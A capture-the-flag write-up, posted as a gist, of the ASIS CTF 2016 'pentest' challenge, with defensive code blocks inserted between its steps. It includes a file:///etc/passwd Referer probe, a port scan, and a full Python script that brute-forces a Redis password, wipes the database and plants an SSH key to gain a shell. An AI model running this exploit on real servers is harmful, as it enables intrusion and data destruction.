@stypr stypr/
Last active Jun 22, 2019

ASIS CTF 2016 Finals: pentest (298pt)

pentest (298pt)

Solves: 1

This write-up was made per request of other players who were playing ASIS CTF.

Note: I solved this challenge before the hint was released. \o/


We got a suspicious web service which does nothing at all. If you have time to test it, please help me to leak out all data from it. Thanks!

Hint: The server keeps your access log on submission.


After searching around for a bit, I found that contact.php had some very suspicious content.

<h5>By clicking send button, you hereby agree that all your access information are allowed to be reviewed.<h4>
<!-- Note: It's all for analytics.. Don't worry, we won't harm you. -->

Analyzing contact.php showed a weird URL check on the Referer header.

POST /contact.php HTTP/1.1
Connection: keep-alive
Content-Length: 109
Pragma: no-cache
Cache-Control: no-cache
Origin: null
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4,zh-CN;q=0.2,zh;q=0.2
Referer: file:///etc/passwd
Cookie: __cfduid=d22559f51eaf8ee0cd770a1564dc3f8f81473527951


HTTP/1.1 200 OK
Date: Sun, 11 Sep 2016 15:22:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: cloudflare-nginx
CF-RAY: 2e0c1e2bbfde3a54-ICN

(... skipped some tags ..)
<div id="body">Invalid

Then I changed the Referer to and got the real IP address of the domain.

For further pentesting, I assumed that discovering the real IP would be the best way to inspect the deeper parts of the service (Cloudflare is a CDN in front of the website, so it won't reveal the server's IP address). The server fetched the Referer URL, and my own access log recorded the request coming from the origin's real IP:

(-) [11/Sep/2016:12:31:48 +0900] "GET /test.php HTTP/1.1" 200 505 "-" 0.005
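The weakness above is that the server fetches whatever URL the client puts in the Referer header: a scheme check alone rejected file://, but any http URL still made the origin connect out and reveal itself. The following validator is an added example (not code from the write-up or the challenge) of the check a defender would apply before fetching a client-supplied URL: only http(s), no userinfo, and no literal loopback, private, link-local or otherwise non-global addresses. The function name is_safe_referer is my own. Hostnames are deliberately not resolved here; the resolved address has to be checked again at connect time, otherwise a DNS name that resolves to an internal address slips through.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_safe_referer(url):
    """Return True only for an http(s) URL that points at a public host.

    Rejects every non-http scheme (file://, gopher://, ...), URLs carrying
    userinfo, "localhost" names, and literal IPs that are not globally
    routable (loopback, RFC 1918, link-local incl. 169.254.169.254, ...).
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        # e.g. an unbalanced IPv6 bracket
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    host = parts.hostname
    if not host or parts.username is not None or parts.password is not None:
        return False
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Not a literal address: accept the name here, but the caller must
        # re-check the resolved address before opening the connection.
        return host != "localhost" and not host.endswith(".localhost")
    return addr.is_global


def filter_referers(urls):
    """Split a list of Referer values into (accepted, rejected)."""
    accepted = [u for u in urls if is_safe_referer(u)]
    rejected = [u for u in urls if not is_safe_referer(u)]
    return accepted, rejected


# Constructed sample Referer values, including the one from the write-up.
SAMPLE_REFERERS = [
    "file:///etc/passwd",
    "http://127.0.0.1/",
    "http://[::1]/",
    "http://169.254.169.254/latest/meta-data/",
    "http://user:pw@example.com/",
    "https://example.com/page",
]

if __name__ == "__main__":
    ok, bad = filter_referers(SAMPLE_REFERERS)
    print("accepted:", ok)
    print("rejected:", bad)
```

Even with this check in place, fetching client-controlled URLs from the origin still discloses the origin's address to whoever owns the destination, which is exactly how the real IP leaked here; if the fetch is not essential, the safer fix is to log the Referer value without ever requesting it.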

From here, I used nmap to see if there are any vulnerable ports open.

$ nmap -sT -p1024-10240

Starting Nmap 7.01 ( ) at 2016-09-11 12:41 JST
Stats: 0:00:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 46.79% done; ETC: 00:27 (0:00:33 remaining)
Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 70.48% done; ETC: 00:27 (0:00:17 remaining)
Nmap scan report for (
Host is up (0.11s latency).
Not shown: 10157 closed ports
3702/tcp filtered unknown
6226/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 54.48 seconds

Then I connected to port 6226 to check for available commands and realized that Redis was running behind it.

$ nc 6226
-ERR unknown command 'HELP'
-NOAUTH Authentication required.
AUTH stypr
-ERR invalid password

There are a lot of Redis brute-force tools available online; however, I made my own brute forcer, since it is easy to write and tools like enteletaor didn't work out well.

I used the top 10000 password wordlist and got the correct authentication with the password crunch.
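The instance fell to a dictionary attack because its only protection was a single weak requirepass on an exposed port, and the CONFIG command was still available. Below is an added example (my own code, not part of the write-up) of a small redis.conf audit that flags exactly those conditions: a missing or dictionary-grade password, binding to all interfaces, protected-mode off, and dangerous commands left enabled. The function names, the finding codes and the two sample configs are constructed for this example; WEAK_PASSWORDS is a tiny stand-in for the kind of top-10k wordlist used above.

```python
# Constructed excerpt of a common-password list; a real audit would load
# the full wordlist the attacker would use.
WEAK_PASSWORDS = {"crunch", "password", "123456", "redis", "admin"}

# Commands that let an authenticated client write files or wipe data.
DANGEROUS_COMMANDS = ("CONFIG", "DEBUG", "FLUSHALL")


def parse_redis_conf(text):
    """Turn redis.conf text into (directive, args) pairs, skipping comments."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        directive = parts[0].lower()
        args = parts[1].strip() if len(parts) > 1 else ""
        entries.append((directive, args))
    return entries


def audit_redis_conf(text, weak_passwords=WEAK_PASSWORDS):
    """Return a list of finding strings; an empty list means nothing flagged."""
    conf, renamed, findings = {}, {}, []
    for directive, args in parse_redis_conf(text):
        if directive == "rename-command":
            fields = args.split(None, 1)
            if len(fields) == 2:
                renamed[fields[0].upper()] = fields[1].strip().strip('"')
        else:
            conf[directive] = args

    password = conf.get("requirepass", "").strip('"')
    if not password:
        findings.append("NO_AUTH: requirepass is not set")
    elif password.lower() in weak_passwords or len(password) < 16:
        findings.append("WEAK_AUTH: requirepass is short or in a common wordlist")

    bind = conf.get("bind", "").split()
    if not bind or "0.0.0.0" in bind or "::" in bind:
        findings.append("EXPOSED: bind is unset or listens on all interfaces")

    if conf.get("protected-mode", "yes").lower() != "yes":
        findings.append("PROTECTED_MODE_OFF: protected-mode is disabled")

    for cmd in DANGEROUS_COMMANDS:
        if cmd not in renamed:
            findings.append("CMD_EXPOSED: %s is neither renamed nor disabled" % cmd)
    return findings


# Constructed sample: roughly what the challenge instance must have looked like.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6226
requirepass crunch
"""

# Constructed sample: the same service with the four issues fixed.
HARDENED_CONF = """
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass 0f3c7b2a9e1d4c6f8b5a7e9d1c3f5a7b
rename-command CONFIG ""
rename-command DEBUG ""
rename-command FLUSHALL ""
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(text) or ["clean"])
```

Disabling CONFIG is the finding that matters most for the attack on this page, since without CONFIG SET dir / dbfilename an authenticated client cannot choose where the dump is written. On Redis 6 and later, per-user ACLs are the cleaner way to restrict those commands than rename-command.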

Then I looked and googled for any possible redis vulnerability and found this good resource.

The only remaining piece was the correct username.

Since the website was made by acid (as seen in the footer of the website), I assumed the username was acid and wrote an exploit for the challenge.

Please check to view the source code.

$ python
Password: crunch
Connection to closed.



#!/usr/bin/python -u
#-*- coding: utf-8 -*-
#Exploit reference:
import os
import socket
import time


def check_pass(host, port, pw):
    # Try one password with the Redis AUTH command over the inline protocol.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.sendall(("AUTH %s\n" % (pw,)).encode())
    reply = s.recv(1024)
    s.close()
    return b'OK' in reply


HOST = ''  # target IP (redacted)
PORT = 6226

# gen pubkey payload: the blank lines keep the key on its own line inside the dump
PUBKEY = '\n\nssh-rsa (REDACTED) root@stypr\n\n'
with open("payload.txt", "w") as f:
    f.write(PUBKEY)

# bruteforce for password (top 10k), one password per line
word_list = open('word.txt').read().splitlines()
for i in word_list:
    if not check_pass(HOST, PORT, i):
        continue
    # push payload
    print("Password: %s" % (i,))
    os.system("redis-cli -h %s -p %s -a %s flushall" % (HOST, PORT, i))
    os.system("cat ./payload.txt | redis-cli -h %s -p %s -a %s -x set pwn" % (HOST, PORT, i))
    # set config
    os.system("redis-cli -h %s -p %s -a %s config set dir /home/acid/.ssh" % (HOST, PORT, i))
    os.system("redis-cli -h %s -p %s -a %s config set dbfilename \"authorized_keys\"" % (HOST, PORT, i))
    # save db
    os.system("redis-cli -h %s -p %s -a %s save" % (HOST, PORT, i))
    # wait for the dump to land on disk
    time.sleep(1)
    # ssh to get the flag
    os.system("ssh acid@%s" % (HOST,))
    break
# ASIS{55ab63e61cac968dd1da217dab2d86b8}
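The exploit works because sshd reads authorized_keys line by line and silently skips lines it cannot parse, so an RDB dump with a key on its own line is accepted just like a hand-written file. That same property makes the planted file easy to recognise after the fact: it starts with the RDB magic "REDIS" and contains binary framing around an otherwise valid key line. The following is an added example (my own detection code, not part of the write-up) that inspects an authorized_keys file for those traces. The function names are mine, and the PLANTED sample is a constructed approximation of such a dump with a placeholder key, not a byte-exact RDB file.

```python
import re

RDB_MAGIC = b"REDIS"  # every RDB dump begins with "REDIS" followed by a 4-digit version

# A public key line as sshd expects it: key type, base64 blob, optional comment.
KEY_LINE = re.compile(
    rb"^(ssh-(rsa|dss|ed25519)|ecdsa-sha2-nistp(256|384|521))\s+[A-Za-z0-9+/=]+(\s+\S.*)?$"
)


def is_text_line(line):
    """True if every byte is printable ASCII, tab or CR (what a real key file contains)."""
    return all(0x20 <= b <= 0x7E or b in (0x09, 0x0D) for b in line)


def inspect_authorized_keys(data):
    """Summarise one authorized_keys file given as bytes."""
    lines = data.split(b"\n")
    keys = [
        line.strip().decode("ascii", "replace")
        for line in lines
        if KEY_LINE.match(line.strip())
    ]
    return {
        "rdb_header": data.startswith(RDB_MAGIC),
        "binary_lines": sum(1 for line in lines if line and not is_text_line(line)),
        "keys": keys,
    }


def planted_by_redis(data):
    """Verdict: an RDB header plus at least one parseable key means a Redis-written key file."""
    verdict = inspect_authorized_keys(data)
    return verdict["rdb_header"] and bool(verdict["keys"])


def scan_key_files(files):
    """Given {path: bytes}, return the paths whose content looks Redis-planted."""
    return sorted(path for path, data in files.items() if planted_by_redis(data))


# Constructed sample: SELECTDB 0, a string key "pwn", the key line with the
# surrounding blank lines from the payload, then the EOF opcode and checksum.
PLANTED = (
    b"REDIS0006\xfe\x00\x00\x03pwn"
    b"\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCplaceholder root@stypr\n\n"
    b"\xff\x12\x34\x56\x78\x9a\xbc\xde\xf0"
)

# Constructed sample: an ordinary hand-written file with a placeholder key.
CLEAN = b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderKeyBytes admin@host\n"

if __name__ == "__main__":
    sample_files = {"/home/acid/.ssh/authorized_keys": PLANTED,
                    "/home/admin/.ssh/authorized_keys": CLEAN}
    print("suspicious:", scan_key_files(sample_files))
```

In an incident this check pairs naturally with two others that need no extra code: comparing the file's mtime with the Redis process's activity, and asking the live instance for CONFIG GET dir and CONFIG GET dbfilename, since a dir pointing into a .ssh directory is not a setting anyone configures legitimately.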

commented Sep 12, 2016

Good job!

Nice writeup, ty.

